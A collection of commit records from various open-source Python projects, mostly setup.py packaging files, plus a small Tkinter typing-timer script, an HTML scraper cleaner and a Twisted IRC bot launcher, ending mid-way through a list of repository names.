classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3"
],
keywords="bikeshare citibike hubway divvy",
author="Jeremy Singer-Vine",
author_email="jsvine@gmail.com",
url="http://github.com/buzzfeednews/bikeshares/",
license="MIT",
packages=find_packages(exclude=["test",]),
namespace_packages=[],
include_package_data=False,
zip_safe=False,
install_requires=[
"pandas",
],
tests_require=[],
test_suite="test",
entry_points={
"console_scripts": [
]
}
)
| mit | Python | |
1f16c8d71ef550c92f3f1851a8b1a94285675eb2 | add setup.py | zencoder/zencoder-py,torchbox/zencoder-py,pbs/zencoder-py | setup.py | setup.py |
from distutils.core import setup
setup(name='zencoder',
version='0.1',
description='Integration library for Zencoder',
author='Alex Schworer',
author_email='alex.schworer@gmail.com',
url='http://github.com/schworer/zencoder-py',
license="MIT License",
packages=['zencoder']
)
| mit | Python | |
e5023ed11a8aff0b84b330bad2796bb28f93483b | add basic setuptools setup.py | opmuse/opmuse,opmuse/opmuse,opmuse/opmuse,opmuse/opmuse | setup.py | setup.py | import os.path
import re
import subprocess
from setuptools import setup
from pip.req import parse_requirements
project_root = os.path.dirname(os.path.abspath(__file__))
git_version = subprocess.check_output(['git', 'describe', 'HEAD', '--tags']).strip().decode('utf8')
git_url = 'https://raw.github.com/opmuse/opmuse/%s/%%s' % git_version
install_requires = []
dependency_links = []
for install_require in parse_requirements('requirements.txt'):
if install_require.req is not None:
install_requires.append(str(install_require.req))
elif install_require.url is not None:
dependency_links.append(git_url % re.sub(r'^file://%s/' % project_root, '', install_require.url))
else:
raise Exception("Couldn't parse requirement from requirements.txt")
setup(
name="opmuse",
version=git_version,
packages=['opmuse'],
description="A web application to play, organize and share your music library.",
author="Mattias Fliesberg",
author_email="mattias.fliesberg@gmail.com",
url="http://opmu.se/",
license="GPLv3",
install_requires=install_requires,
dependency_links=dependency_links,
entry_points={
'console_scripts': [
'opmuse = opmuse.boot'
]
}
)
| agpl-3.0 | Python | |
4364b952701b6ce3883094676ea9d8d93757cbde | Add bare setup.py | teddywing/django-sneak-peek | setup.py | setup.py | import os
from setuptools import setup, find_packages
setup(
name='django-sneak-peek',
version='0.0.1',
description='',
long_description='',
url='',
license='MIT',
author='Teddy Wing',
author_email='',
include_package_data=True,
packages=find_packages(),
classifiers=[],
) | mit | Python | |
14aa0c03673abea5cbd954aafb909b581c8ce849 | Add setup.py | vshymanskyy/blynk-library-python | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
setup(
name = "blynk-library-python",
version = "0.1.0", #blynk.lib.__version__
description = "Blynk library",
platforms = "any",
url = "http://www.blynk.cc",
license = "MIT",
author = "Volodymyr Shymanskyy",
author_email = "vshymanskyi@gmail.com",
py_modules = ['BlynkLib'],
classifiers = [
"Topic :: Software Development :: Libraries :: Python Modules",
"Development Status :: 2 - Pre-Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS :: MacOS X"
]
)
| mit | Python | |
1b96dbf3882301dbfa8d8d102f1cead2e2b0447d | bump version | autopulated/yotta,eyeye/yotta,BlackstoneEngineering/yotta,BlackstoneEngineering/yotta,autopulated/yotta,eyeye/yotta,stevenewey/yotta,stevenewey/yotta,ARMmbed/yotta,ARMmbed/yotta | setup.py | setup.py | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import os
from setuptools import setup, find_packages
# Utility function to cat in a file (used for the README)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# we need 'ntfsutils' in Windows
if os.name == 'nt':
platform_deps = ['ntfsutils>=0.1.3,<0.2']
entry_points={
"console_scripts": [
"yotta=yotta:main",
"yt=yotta:main",
],
}
scripts = []
else:
platform_deps = []
# entry points are nice, but add ~100ms to startup time with all the
# pkg_resources infrastructure, so we use scripts= instead on unix-y
# platforms:
scripts = ['bin/yotta', 'bin/yt']
entry_points = {}
setup(
name = "yotta",
version = "0.7.0",
author = "James Crosby",
author_email = "James.Crosby@arm.com",
description = ("Re-usable components for embedded software."),
license = "Apache-2.0",
keywords = "embedded package module dependency management",
url = "about:blank",
packages=find_packages(),
package_data={
'yotta': ['lib/schema/*.json', 'lib/templates/*.txt', 'lib/templates/*.cmake']
},
long_description=read('readme.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
],
entry_points=entry_points,
scripts=scripts,
test_suite = 'yotta.test',
install_requires=[
'semantic_version>=2.3.1,<3',
'requests>=2.4.3,<3',
'PyGithub>=1.25,<2',
'colorama>=0.3,<0.4',
'hgapi>=1.7,<2',
'Jinja2>=2.7.0,<3',
'cryptography>=0.8',
'PyJWT>=1.0,<2.0',
'pathlib>=1.0.1,<1.1',
'jsonschema>=2.4.0,<3.0',
'argcomplete>=0.8.0,<1.0',
'mbed_test_wrapper>=0.0.2,<0.1.0',
'valinor>=0.0.0,<1.0',
'intelhex>=2.0,<3.0'
] + platform_deps
)
| # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import os
from setuptools import setup, find_packages
# Utility function to cat in a file (used for the README)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# we need 'ntfsutils' in Windows
if os.name == 'nt':
platform_deps = ['ntfsutils>=0.1.3,<0.2']
entry_points={
"console_scripts": [
"yotta=yotta:main",
"yt=yotta:main",
],
}
scripts = []
else:
platform_deps = []
# entry points are nice, but add ~100ms to startup time with all the
# pkg_resources infrastructure, so we use scripts= instead on unix-y
# platforms:
scripts = ['bin/yotta', 'bin/yt']
entry_points = {}
setup(
name = "yotta",
version = "0.6.2",
author = "James Crosby",
author_email = "James.Crosby@arm.com",
description = ("Re-usable components for embedded software."),
license = "Apache-2.0",
keywords = "embedded package module dependency management",
url = "about:blank",
packages=find_packages(),
package_data={
'yotta': ['lib/schema/*.json', 'lib/templates/*.txt', 'lib/templates/*.cmake']
},
long_description=read('readme.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
],
entry_points=entry_points,
scripts=scripts,
test_suite = 'yotta.test',
install_requires=[
'semantic_version>=2.3.1,<3',
'requests>=2.4.3,<3',
'PyGithub>=1.25,<2',
'colorama>=0.3,<0.4',
'hgapi>=1.7,<2',
'Jinja2>=2.7.0,<3',
'cryptography>=0.8',
'PyJWT>=1.0,<2.0',
'pathlib>=1.0.1,<1.1',
'jsonschema>=2.4.0,<3.0',
'argcomplete>=0.8.0,<1.0',
'mbed_test_wrapper>=0.0.2,<0.1.0',
'valinor>=0.0.0,<1.0',
'intelhex>=2.0,<3.0'
] + platform_deps
)
| apache-2.0 | Python |
6e601d9720139bbb04c1fd30dc6552730270ba0a | Fix the versioned Django, we're grabbing 1.4.1 off the requirements.txt | sunlightlabs/billy,loandy/billy,mileswwatkins/billy,sunlightlabs/billy,openstates/billy,loandy/billy,loandy/billy,openstates/billy,mileswwatkins/billy,mileswwatkins/billy,sunlightlabs/billy,openstates/billy | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
from billy import __version__
long_description = open('README.rst').read()
setup(name='billy',
version=__version__,
packages=find_packages(),
package_data={'billy': ['schemas/*.json',
'schemas/api/*.json',
'schemas/relax/api.rnc'],
'billy.web.admin': ['templates/billy/*.html'],
},
author="James Turk",
author_email="jturk@sunlightfoundation.com",
license="GPL v3",
url="http://github.com/sunlightlabs/billy/",
description='scraping, storing, and sharing legislative information',
long_description=long_description,
platforms=['any'],
entry_points="""
[console_scripts]
billy-scrape = billy.bin.update:scrape_compat_main
billy-update = billy.bin.update:main
billy-util = billy.bin.util:main
""",
install_requires=[
"Django>=1.4",
"argparse==1.1",
"boto",
"django-piston",
"icalendar",
"lxml>=2.2",
"name_tools>=0.1.2",
"nose",
"pymongo>=2.2",
"scrapelib>=0.7.0",
"unicodecsv",
"validictory>=0.7.1",
"pyes",
]
)
| #!/usr/bin/env python
from setuptools import setup, find_packages
from billy import __version__
long_description = open('README.rst').read()
setup(name='billy',
version=__version__,
packages=find_packages(),
package_data={'billy': ['schemas/*.json',
'schemas/api/*.json',
'schemas/relax/api.rnc'],
'billy.web.admin': ['templates/billy/*.html'],
},
author="James Turk",
author_email="jturk@sunlightfoundation.com",
license="GPL v3",
url="http://github.com/sunlightlabs/billy/",
description='scraping, storing, and sharing legislative information',
long_description=long_description,
platforms=['any'],
entry_points="""
[console_scripts]
billy-scrape = billy.bin.update:scrape_compat_main
billy-update = billy.bin.update:main
billy-util = billy.bin.util:main
""",
install_requires=[
"Django==1.4",
"argparse==1.1",
"boto",
"django-piston",
"icalendar",
"lxml>=2.2",
"name_tools>=0.1.2",
"nose",
"pymongo>=2.2",
"scrapelib>=0.7.0",
"unicodecsv",
"validictory>=0.7.1",
"pyes",
]
)
| bsd-3-clause | Python |
e38e0789f65e174770aeca44abec9e3e47503cbb | include user-extensions.js containing flex methods into installation | bs00336332/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,bs00336332/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,bs00336332/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
from os.path import abspath, dirname, join
execfile(join(dirname(abspath(__file__)), 'src', 'SeleniumLibrary', 'version.py'))
setup(name = 'robotframework-seleniumlibrary',
version = VERSION,
description = 'Web testing library for Robot Framework',
author = 'Robot Framework Developers',
author_email = 'robotframework-users@googlegroups.com',
url = 'http://code.google.com/p/robotframework-seleniumlibrary',
package_dir = {'' : 'src'},
packages = ['SeleniumLibrary'],
package_data = {'SeleniumLibrary': ['lib/*.jar',
'lib/user-extensions.js',
'firefoxprofile/*.*']},
)
| #!/usr/bin/env python
from distutils.core import setup
from os.path import abspath, dirname, join
execfile(join(dirname(abspath(__file__)), 'src', 'SeleniumLibrary', 'version.py'))
setup(name = 'robotframework-seleniumlibrary',
version = VERSION,
description = 'Web testing library for Robot Framework',
author = 'Robot Framework Developers',
author_email = 'robotframework-users@googlegroups.com',
url = 'http://code.google.com/p/robotframework-seleniumlibrary',
package_dir = {'' : 'src'},
packages = ['SeleniumLibrary'],
package_data = {'SeleniumLibrary': ['lib/*.jar', 'firefoxprofile/*.*']},
)
| apache-2.0 | Python |
cd9aea1addd55be7c9d8adfb91137d9581af9317 | Add minimum setup.py | gchandrasa/expertsender | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='expertsender',
version='0.1.0',
description='Python API library for the ExpertSender email platform',
author='Gilang Chandrasa',
author_email='gilang@launchpotato.com',
url='https://github.com/gchandrasa/expertsender',
packages=[
'expertsender',
],
package_dir={'expertsender':
'expertsender'},
install_requires=[
"requests",
"lxml",
],
)
| mit | Python | |
fb4034da63c69e653441417e6037fe72127f0a8a | Create step1.py | gangulydebojyoti/method-for-security-system-bypassing | step1.py | step1.py | from Tkinter import *
import time
import sqlite3 as lite
import random
root=Tk()
a4=[]
m1=0
m2=0
m3=0
a5=[]
a6=''
from tkMessageBox import *
def check1():
h=en.get()
if(h==a6):
t2=time.time()
t3=t2-t1
print "t3 is: ",t3
cur.execute("insert into pro_crypto values(?,?,?,?)",(m1,m2,m3,t3,))
c.commit()
else:
showinfo('','you have entered wrong')
## print "m1 is: ",m1
## print "t3 is: ",t3
## cur.execute("insert into pro_crypto values(?,?,?,?)",(m1,m2,m3,t3,))
## print t3
## en=Entry(root)
## en.grid(row=1,column=1)
check()
def check():
## en=Entry(root)
## en.grid(row=1,column=1)
global m1,m2,m3,a6,t3,t2,t1,en
en=Entry(root)
en.grid(row=1,column=1)
a1=['a','q','w','s','d','z','x','c','e']
a2=['r','t','y','f','g','h','v','b','n']
a3=['u','i','o','p','j','k','l','m']
for k in range(0,6):
a4.append(random.choice(a1[random.randint(0,8)]+a2[random.randint(0,8)]+a3[random.randint(0,7)]))
print a4
m1=0
m2=0
m3=0
for i in range(0,6):
if(a4[i] in a1):
m1=int(m1)+1
elif(a4[i] in a2):
m2=int(m2)+1
elif(a4[i] in a3):
m3=int(m3)+1
a6=''
for i in range(0,6):
a6 +=str(a4[i])
a4[:]=[]
print 'm1 is',m1
print 'm2 is',m2
print 'm3 is',m3
Label(root,text=a6).grid(row=1,column=0)
t1=time.time()
print 'a6 is',a6
## t2=time.time()
## if(h==a6):
##
## t3=t2-t1
## print "m1 is: ",m1
## print "t3 is: ",t3
## cur.execute("insert into pro_crypto values(?,?)",(m1,m2,m3,t3,))
## print t3
## c.commit()
Label(root,text="Please enter the words in the box::").grid(row=0,column=0)
Button(root,text='Next',command=check1).grid(row=2,column=2)
c=lite.connect("project10.db")
cur=c.cursor()
cur.execute("create table pro_crypto(Category1 varchar(20),Category2 varchar(20),Category3 varchar(20),Time varchar(20))")
##cur.execute("insert into user values('raj','saha')")
check()
root.mainloop()
| unlicense | Python | |
dd37a333a84fb6c636a26a3d96d56925c0ec06a8 | Create cleaner.py | DataScience-appliquee/Plateforme-prediction-velov,DataScience-appliquee/Plateforme-prediction-velov | Meteo/meteociel/cleaner.py | Meteo/meteociel/cleaner.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
def cleaner(source):
"Clean all source code to make something sweet or at least, trying to"
# Brute encode to utf-8 because source code looks like a mix between iso-8859-1 and something else (kind of a joke isn't it ?)
# It seems to be ok but at html.fromString(trueCode) it's going crazy, it changes string's charset
# which is making me crazy. Doesn't matter, I have another solution ;)
#source = source.encode("utf-8")
#source = UnicodeDammit(source)
#source = source.unicode_markup
# Getting the one and only useful code in all of this garbage
startIndex = source.index("<table width=100% border=1 cellpadding=1 cellspacing=0 bordercolor=#C0C8FE bgcolor=#EBFAF7>")
startingCode = source[startIndex:]
endIndex = startingCode.index("</table>")
trueCode = startingCode[:endIndex+8]
# It would have been easier if it worked on this shitty website source code...
#print(clean_html(trueCode))
# but instead, I have to clean this mess manually...
trueCode = trueCode.replace("<br>", "")
trueCode = trueCode.replace("<i>", "")
trueCode = trueCode.replace("</i>", "")
trueCode = trueCode.replace("<b>", "")
trueCode = trueCode.replace("</b>", "")
trueCode = trueCode.replace(" ", " ")
trueCode = trueCode.replace(" ", "")
trueCode = trueCode.replace(" align=center", "")
trueCode = trueCode.replace(" align=\"center\"", "")
trueCode = trueCode.replace(" colspan=2", "")
trueCode = trueCode.replace("<div>", "")
trueCode = trueCode.replace("</div>", "")
# Delete all units
trueCode = trueCode.replace(" hPa", "")
trueCode = trueCode.replace(" h", "")
trueCode = trueCode.replace(" km/h", "")
trueCode = trueCode.replace("%", "")
trueCode = trueCode.replace(" km", "")
trueCode = trueCode.replace(" aucune", "0")
#... and apply my encoding charset solution !
trueCode = trueCode.replace(u"\xe9", "e")
trueCode = trueCode.replace(u" \xb0C", "")
return trueCode
| mit | Python | |
7736c11b005f9baefc7ba9c35884deddc56bc191 | Test file to check if twistd is working | HubbeKing/Hubbot_Twisted | test.tac | test.tac | from twisted.application import internet, service
from hubbebot import *
application = service.Application("AllTheHubbeBots")
internet.TCPClient("irc.desertbus.org", 6667, HubbeBotFactory()).setServiceParent(application)
| mit | Python | |
24e914da9e0e38728d862ecc82f8443a3b88e68f | add expression to improve the domain | Danisan/odoo-1,fdvarela/odoo8,tvtsoft/odoo8,xzYue/odoo,sysadminmatmoz/OCB,hopeall/odoo,papouso/odoo,hip-odoo/odoo,savoirfairelinux/odoo,patmcb/odoo,goliveirab/odoo,lombritz/odoo,avoinsystems/odoo,makinacorpus/odoo,shingonoide/odoo,acshan/odoo,sve-odoo/odoo,jfpla/odoo,MarcosCommunity/odoo,bkirui/odoo,camptocamp/ngo-addons-backport,jolevq/odoopub,n0m4dz/odoo,SerpentCS/odoo,vrenaville/ngo-addons-backport,klunwebale/odoo,rschnapka/odoo,ramitalat/odoo,shivam1111/odoo,bkirui/odoo,stephen144/odoo,podemos-info/odoo,Bachaco-ve/odoo,omprakasha/odoo,datenbetrieb/odoo,ygol/odoo,shaufi10/odoo,jeasoft/odoo,markeTIC/OCB,frouty/odoogoeen,damdam-s/OpenUpgrade,synconics/odoo,hanicker/odoo,shaufi10/odoo,pedrobaeza/OpenUpgrade,pedrobaeza/OpenUpgrade,javierTerry/odoo,inspyration/odoo,ShineFan/odoo,cedk/odoo,odooindia/odoo,poljeff/odoo,colinnewell/odoo,NeovaHealth/odoo,Antiun/odoo,Daniel-CA/odoo,vnsofthe/odoo,RafaelTorrealba/odoo,grap/OCB,collex100/odoo,rschnapka/odoo,nhomar/odoo,dalegregory/odoo,jaxkodex/odoo,janocat/odoo,bguillot/OpenUpgrade,nuuuboo/odoo,stephen144/odoo,JCA-Developpement/Odoo,shingonoide/odoo,nitinitprof/odoo,jiachenning/odoo,florian-dacosta/OpenUpgrade,MarcosCommunity/odoo,hifly/OpenUpgrade,deKupini/erp,codekaki/odoo,guewen/OpenUpgrade,fjbatresv/odoo,abstract-open-solutions/OCB,naousse/odoo,klunwebale/odoo,windedge/odoo,collex100/odoo,kittiu/odoo,Noviat/odoo,dllsf/odootest,JonathanStein/odoo,tinkhaven-organization/odoo,apanju/odoo,steedos/odoo,lgscofield/odoo,slevenhagen/odoo,hbrunn/OpenUpgrade,VielSoft/odoo,Endika/OpenUpgrade,VielSoft/odoo,PongPi/isl-odoo,VitalPet/odoo,sysadminmatmoz/OCB,jusdng/odoo,hanicker/odoo,csrocha/OpenUpgrade,credativUK/OCB,leoliujie/odoo,gsmartway/odoo,abstract-open-solutions/OCB,Ichag/odoo,0k/odoo,VitalPet/odoo,erkrishna9/odoo,jpshort/odoo,virgree/odoo,shaufi/odoo,takis/odoo,ehirt/odoo,BT-fgarbely/odoo,odoo-turkiye/odoo,FlorianLudwig/odoo,dllsf/odootest,glovebx/odoo,Kilhog/odoo,dariemp/odoo,Eric-Zhong/odoo,steedos/odoo,camptocamp/ngo-addons-backport,lombritz/odoo,fjbatresv/odoo,sinbazhou/odoo,x111ong/odoo,javierTerry/odoo,hanicker/odoo,oihane/odoo,doomsterinc/odoo,mvaled/OpenUpgrade,chiragjogi/odoo,alhashash/odoo,ingadhoc/odoo,pplatek/odoo,charbeljc/OCB,apocalypsebg/odoo,patmcb/odoo,codekaki/odoo,ThinkOpen-Solutions/odoo,dllsf/odootest,andreparames/odoo,OpenPymeMx/OCB,hoatle/odoo,alqfahad/odoo,markeTIC/OCB,ClearCorp-dev/odoo,alqfahad/odoo,ShineFan/odoo,gsmartway/odoo,OpusVL/odoo,ihsanudin/odoo,OpenUpgrade/OpenUpgrade,TRESCLOUD/odoopub,BT-astauder/odoo,nexiles/odoo,charbeljc/OCB,dfang/odoo,abdellatifkarroum/odoo,nitinitprof/odoo,gorjuce/odoo,fevxie/odoo,aviciimaxwell/odoo,AuyaJackie/odoo,makinacorpus/odoo,hmen89/odoo,QianBIG/odoo,cpyou/odoo,alexcuellar/odoo,joariasl/odoo,kifcaliph/odoo,Grirrane/odoo,nitinitprof/odoo,credativUK/OCB,lgscofield/odoo,bwrsandman/OpenUpgrade,ojengwa/odoo,xujb/odoo,leorochael/odoo,FlorianLudwig/odoo,dkubiak789/odoo,CubicERP/odoo,luistorresm/odoo,tangyiyong/odoo,rdeheele/odoo,grap/OpenUpgrade,frouty/odoo_oph,spadae22/odoo,NL66278/OCB,ihsanudin/odoo,realsaiko/odoo,glovebx/odoo,SerpentCS/odoo,tarzan0820/odoo,abstract-open-solutions/OCB,mustafat/odoo-1,vrenaville/ngo-addons-backport,jfpla/odoo,abenzbiria/clients_odoo,laslabs/odoo,naousse/odoo,bealdav/OpenUpgrade,nexiles/odoo,tvibliani/odoo,nexiles/odoo,Ernesto99/odoo,rgeleta/odoo,GauravSahu/odoo,shaufi/odoo,ccomb/OpenUpgrade,grap/OCB,lombritz/odoo,Antiun/odoo,jolevq/odoopub,odoousers2014/odoo,chiragjogi/odoo,CopeX/odoo,Kilhog/odoo,agrista/odoo-saas,ShineFan/odoo,doomsterinc/odoo,synconics/odoo,juanalfonsopr/odoo,eino-makitalo/odoo,ecosoft-odoo/odoo,microcom/odoo,cdrooom/odoo,RafaelTorrealba/odoo,nuuuboo/odoo,optima-ict/odoo,laslabs/odoo,pedrobaeza/odoo,shingonoide/odoo,hopeall/odoo,ojengwa/odoo,Drooids/odoo,christophlsa/odoo,syci/OCB,Endika/odoo,glovebx/odoo,tvibliani/odoo,nhomar/odoo-mirror,dkubiak789/odoo,avoinsystems/odoo,kirca/OpenUpgrade,feroda/odoo,MarcosCommunity/odoo,0k/odoo,ehirt/odoo,jiangzhixiao/odoo,xzYue/odoo,colinnewell/odoo,kittiu/odoo,acshan/odoo,alhashash/odoo,goliveirab/odoo,hifly/OpenUpgrade,mlaitinen/odoo,odoo-turkiye/odoo,joshuajan/odoo,idncom/odoo,pedrobaeza/OpenUpgrade,dsfsdgsbngfggb/odoo,sadleader/odoo,ShineFan/odoo,Nick-OpusVL/odoo,elmerdpadilla/iv,steedos/odoo,oasiswork/odoo,hubsaysnuaa/odoo,frouty/odoo_oph,Antiun/odoo,prospwro/odoo,avoinsystems/odoo,alexteodor/odoo,ramadhane/odoo,gorjuce/odoo,odoousers2014/odoo,mvaled/OpenUpgrade,acshan/odoo,pedrobaeza/odoo,ThinkOpen-Solutions/odoo,ujjwalwahi/odoo,odooindia/odoo,NL66278/OCB,Endika/OpenUpgrade,mlaitinen/odoo,glovebx/odoo,jpshort/odoo,jeasoft/odoo,bwrsandman/OpenUpgrade,bakhtout/odoo-educ,ramadhane/odoo,prospwro/odoo,tangyiyong/odoo,OpenUpgrade/OpenUpgrade,Elico-Corp/odoo_OCB,ramadhane/odoo,collex100/odoo,OpenPymeMx/OCB,oihane/odoo,hip-odoo/odoo,luistorresm/odoo,Endika/OpenUpgrade,ChanduERP/odoo,n0m4dz/odoo,realsaiko/odoo,kirca/OpenUpgrade,luiseduardohdbackup/odoo,hbrunn/OpenUpgrade,colinnewell/odoo,fjbatresv/odoo,BT-rmartin/odoo,Gitlab11/odoo,mvaled/OpenUpgrade,Gitlab11/odoo,bobisme/odoo,Noviat/odoo,dariemp/odoo,joariasl/odoo,addition-it-solutions/project-all,sinbazhou/odoo,jaxkodex/odoo,QianBIG/odoo,srimai/odoo,synconics/odoo,credativUK/OCB,dfang/odoo,wangjun/odoo,numerigraphe/odoo,guewen/OpenUpgrade,apocalypsebg/odoo,spadae22/odoo,Kilhog/odoo,dezynetechnologies/odoo,fuselock/odoo,nhomar/odoo-mirror,ApuliaSoftware/odoo,frouty/odoo_oph,slevenhagen/odoo,numerigraphe/odoo,Endika/OpenUpgrade,jiangzhixiao/odoo,kittiu/odoo,colinnewell/odoo,optima-ict/odoo,odootr/odoo,abdellatifkarroum/odoo,provaleks/o8,bealdav/OpenUpgrade,realsaiko/odoo,shingonoide/odoo,Antiun/odoo,abdellatifkarroum/odoo,jeasoft/odoo,janocat/odoo,ccomb/OpenUpgrade,podemos-info/odoo,fjbatresv/odoo,ecosoft-odoo/odoo,odoo-turkiye/odoo,cloud9UG/odoo,abdellatifkarroum/odoo,arthru/OpenUpgrade,bwrsandman/OpenUpgrade,oasiswork/odoo,klunwebale/odoo,sve-odoo/odoo,Gitlab11/odoo,poljeff/odoo,thanhacun/odoo,Maspear/odoo,rgeleta/odoo,kybriainfotech/iSocioCRM,addition-it-solutions/project-all,odooindia/odoo,poljeff/odoo,gdgellatly/OCB1,Antiun/odoo,podemos-info/odoo,JCA-Developpement/Odoo,0k/OpenUpgrade,demon-ru/iml-crm,fossoult/odoo,shaufi10/odoo,massot/odoo,lightcn/odoo,rahuldhote/odoo,jusdng/odoo,nhomar/odoo,ramitalat/odoo,Bachaco-ve/odoo,guewen/OpenUpgrade,x111ong/odoo,guerrerocarlos/odoo,Codefans-fan/odoo,MarcosCommunity/odoo,KontorConsulting/odoo,funkring/fdoo,salaria/odoo,Endika/odoo,provaleks/o8,ShineFan/odoo,klunwebale/odoo,Elico-Corp/odoo_OCB,andreparames/odoo,ygol/odoo,pplatek/odoo,hifly/OpenUpgrade,BT-ojossen/odoo,hubsaysnuaa/odoo,feroda/odoo,leoliujie/odoo,sysadminmatmoz/OCB,arthru/OpenUpgrade,ThinkOpen-Solutions/odoo,eino-makitalo/odoo,florian-dacosta/OpenUpgrade,jiangzhixiao/odoo,fuhongliang/odoo,ujjwalwahi/odoo,OpenPymeMx/OCB,AuyaJackie/odoo,ccomb/OpenUpgrade,n0m4dz/odoo,pedrobaeza/OpenUpgrade,factorlibre/OCB,Ichag/odoo,rahuldhote/odoo,BT-ojossen/odoo,naousse/odoo,codekaki/odoo,Elico-Corp/odoo_OCB,janocat/odoo,RafaelTorrealba/odoo,Kilhog/odoo,hmen89/odoo,NL66278/OCB,OpenUpgrade-dev/OpenUpgrade,nexiles/odoo,jpshort/odoo,syci/OCB,Eric-Zhong/odoo,matrixise/odoo,lightcn/odoo,alexcuellar/odoo,klunwebale/odoo,mustafat/odoo-1,OpenUpgrade/OpenUpgrade,JonathanStein/odoo,thanhacun/odoo,gavin-feng/odoo,tinkerthaler/odoo,fuselock/odoo,sve-odoo/odoo,dsfsdgsbngfggb/odoo,kittiu/odoo,nagyistoce/odoo-dev-odoo,gsmartway/odoo,OpenPymeMx/OCB,rowemoore/odoo,srsman/odoo,minhtuancn/odoo,makinacorpus/odoo,BT-ojossen/odoo,fgesora/odoo,KontorConsulting/odoo,andreparames/odoo,charbeljc/OCB,dfang/odoo,dsfsdgsbngfggb/odoo,Danisan/odoo-1,Nowheresly/odoo,oliverhr/odoo,frouty/odoogoeen,VitalPet/odoo,takis/odoo,cloud9UG/odoo,FlorianLudwig/odoo,OpenUpgrade/OpenUpgrade,florentx/OpenUpgrade,abenzbiria/clients_odoo,Ichag/odoo,jfpla/odoo,feroda/odoo,grap/OpenUpgrade,rubencabrera/odoo,guerrerocarlos/odoo,realsaiko/odoo,eino-makitalo/odoo,leorochael/odoo,hopeall/odoo,apanju/GMIO_Odoo,steedos/odoo,Codefans-fan/odoo,nexiles/odoo,abenzbiria/clients_odoo,kybriainfotech/iSocioCRM,steedos/odoo,jfpla/odoo,virgree/odoo,alexcuellar/odoo,NL66278/OCB,andreparames/odoo,hoatle/odoo,pedrobaeza/odoo,apanju/GMIO_Odoo,fevxie/odoo,fgesora/odoo,patmcb/odoo,PongPi/isl-odoo,rschnapka/odoo,zchking/odoo,cdrooom/odoo,ramadhane/odoo,makinacorpus/odoo,Nick-OpusVL/odoo,x111ong/odoo,apanju/odoo,NL66278/OCB,mlaitinen/odoo,Endika/odoo,fuhongliang/odoo,luistorresm/odoo,jeasoft/odoo,chiragjogi/odoo,sinbazhou/odoo,incaser/odoo-odoo,diagramsoftware/odoo,jpshort/odoo,CubicERP/odoo,lsinfo/odoo,vrenaville/ngo-addons-backport,abenzbiria/clients_odoo,BT-fgarbely/odoo,lsinfo/odoo,BT-fgarbely/odoo,ovnicraft/odoo,feroda/odoo,juanalfonsopr/odoo,BT-rmartin/odoo,dalegregory/odoo,javierTerry/odoo,grap/OpenUpgrade,highco-groupe/odoo,klunwebale/odoo,florian-dacosta/OpenUpgrade,vnsofthe/odoo,OSSESAC/odoopubarquiluz,savoirfairelinux/OpenUpgrade,funkring/fdoo,tarzan0820/odoo,dkubiak789/odoo,osvalr/odoo,fuselock/odoo,SAM-IT-SA/odoo,bguillot/OpenUpgrade,AuyaJackie/odoo,BT-astauder/odoo,bkirui/odoo,osvalr/odoo,ygol/odoo,shivam1111/odoo,BT-ojossen/odoo,joariasl/odoo,hassoon3/odoo,naousse/odoo,leorochael/odoo,BT-fgarbely/odoo,javierTerry/odoo,ecosoft-odoo/odoo,feroda/odoo,xzYue/odoo,rubencabrera/odoo,grap/OCB,joshuajan/odoo,rowemoore/odoo,javierTerry/odoo,florentx/OpenUpgrade,acshan/odoo,lightcn/odoo,sysadminmatmoz/OCB,rahuldhote/odoo,jfpla/odoo,leorochael/odoo,ojengwa/odoo,takis/odoo,srimai/odoo,Adel-Magebinary/odoo,rdeheele/odoo,BT-rmartin/odoo,florentx/OpenUpgrade,PongPi/isl-odoo,mkieszek/odoo,BT-fgarbely/odoo,NeovaHealth/odoo,savoirfairelinux/odoo,nuuuboo/odoo,aviciimaxwell/odoo,grap/OCB,ccomb/OpenUpgrade,agrista/odoo-saas,rschnapka/odoo,tangyiyong/odoo,CopeX/odoo,brijeshkesariya/odoo,rgeleta/odoo,rahuldhote/odoo,JGarcia-Panach/odoo,hassoon3/odoo,JGarcia-Panach/odoo,BT-rmartin/odoo,csrocha/OpenUpgrade,eino-makitalo/odoo,apanju/GMIO_Odoo,zchking/odoo,papouso/odoo,nhomar/odoo-mirror,prospwro/odoo,Maspear/odoo,GauravSahu/odoo,Bachaco-ve/odoo,abstract-open-solutions/OCB,cloud9UG/odoo,OpenUpgrade-dev/OpenUpgrade,tvibliani/odoo,JonathanStei